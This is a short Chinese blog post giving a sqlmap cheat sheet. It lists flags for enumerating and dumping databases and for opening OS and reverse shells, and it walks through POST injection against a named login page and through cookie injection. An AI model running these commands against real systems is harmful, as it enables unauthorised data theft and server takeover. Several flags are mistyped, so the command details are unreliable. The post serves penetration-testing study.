SQLMAP用法

基本用法:

  --dbs  查询数据库

  --current--db  获取当前数据库名称

  --current--user 获得用户

  --tables -D “数据库”   // 列举数据库的表名

  --columns -T “表名” -D “数据库”   // 获取表的列名

  --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

  –privileges / 查看权限

  privileges -U root / 查看用户权限

  –roles / 枚举数据库用户角色

  --proxy "http://127.0.0.1:8080" 代理注入

  --sql-query=xx 要执行的SQL语句

  --sql-shell 提示交互式 SQL 的 shell

  --os-cmd=xxx执行操作系统命令
  --os-shell 交互式的操作系统的 shell
  --os-pwn 反弹shell
  --reg-read 读取win系统注册表
  --dbs-o "sqlmap.log" 保存进度
  --dbs-o "sqlmap.log" -resume 恢复已保存进度

POST注入   

  1. 浏览器打开目标地址http:// blog.websafe3.org /Login.asp
  2. 配置burp代理(127.0.0.1:8080)以拦截请求
  3. 点击login表单的submit按钮
  4. 这时候Burp会拦截到了我们的登录POST请求
  5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

  6. 运行sqlmap并使用如下命令:

  ./sqlmap.py -r search-test.txt -p tfUPass  

  这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
  而-p 大家应该比较熟悉,指定注入用的参数。

COOKIES注入

  sqlmap.py -u "http://127.0.0.1/base.php" --cookies "id=1" --dbs --level 2

  默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查 cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 --level 2 即可

 

posted @ 2018-04-23 09:17  G0mini  阅读(518)  评论(0编辑  收藏  举报